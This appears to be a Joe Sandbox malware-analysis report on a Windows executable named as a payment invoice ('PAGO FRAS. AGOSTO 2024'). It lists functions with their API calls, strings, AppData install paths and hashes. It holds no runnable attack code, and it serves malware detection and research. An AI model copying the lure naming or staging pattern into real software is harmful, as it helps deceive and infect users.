Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26

Function 0040597D Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6

Function 0040548B Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
GetLastError.KERNEL32 ref: 0040549F

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E

Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69

Function 00405A49 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9

Function 00405A1A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
Instruction ID: 6a3e57155666377f6ae5a5c5a230e2cf9c2db004969d7e98ca1d37c028e4fb03
Opcode Fuzzy Hash: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
Instruction Fuzzy Hash: A2D05B33B14100DBDB10EBE5DF08A9D73A5BB60329B308637D201F21D1D7B9C9559B29

Function 00403F60 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(0001048C,00000000,00000000,00000000), ref: 00403F72

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D

Function 00403F49 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29

Function 004030C7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Non-executed Functions

Function 00405086 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004050E5
GetDlgItem.USER32(?,000003EE), ref: 004050F4
GetClientRect.USER32(?,?), ref: 00405131
GetSystemMetrics.USER32(00000002), ref: 00405138
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
ShowWindow.USER32(?,00000008), ref: 004051D4
GetDlgItem.USER32(?,000003EC), ref: 004051F5
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
GetDlgItem.USER32(?,000003F8), ref: 00405103

Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57

GetDlgItem.USER32(?,000003EC), ref: 00405246
CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
CloseHandle.KERNEL32(00000000), ref: 0040525B
ShowWindow.USER32(00000000), ref: 0040527E
ShowWindow.USER32(?,00000008), ref: 00405285
ShowWindow.USER32(00000008), ref: 004052CB
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
CreatePopupMenu.USER32 ref: 00405310
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
GetWindowRect.USER32(?,000000FF), ref: 00405345
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
OpenClipboard.USER32(00000000), ref: 004053AA
EmptyClipboard.USER32 ref: 004053B0
GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
GlobalLock.KERNEL32(00000000), ref: 004053C3
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
GlobalUnlock.KERNEL32(00000000), ref: 004053F0
SetClipboardData.USER32(00000001,00000000), ref: 004053FB
CloseClipboard.USER32 ref: 00405401

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
Opcode Fuzzy Hash: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69

Function 00404352 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004043A1
SetWindowTextA.USER32(00000000,?), ref: 004043CB
SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
CoTaskMemFree.OLE32(00000000), ref: 00404487
lstrcmpiA.KERNEL32(Space required: ,00429868), ref: 004044B9
lstrcatA.KERNEL32(?,Space required: ), ref: 004044C5
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7

Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C

Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
Part of subcall function 00405F9A: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014

GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0

Part of subcall function 00404709: lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
Part of subcall function 00404709: SetDlgItemTextA.USER32(?,00429868), ref: 004047C2

Strings

Space required: , xrefs: 004044B3, 004044B8, 004044C3
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 004044A2
A, xrefs: 00404475

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Space required:
API String ID: 2624150263-1533186396
Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69

Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189

Strings

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets, xrefs: 0040211D

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets
API String ID: 123533781-1810565758
Opcode ID: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
Opcode Fuzzy Hash: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14

Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
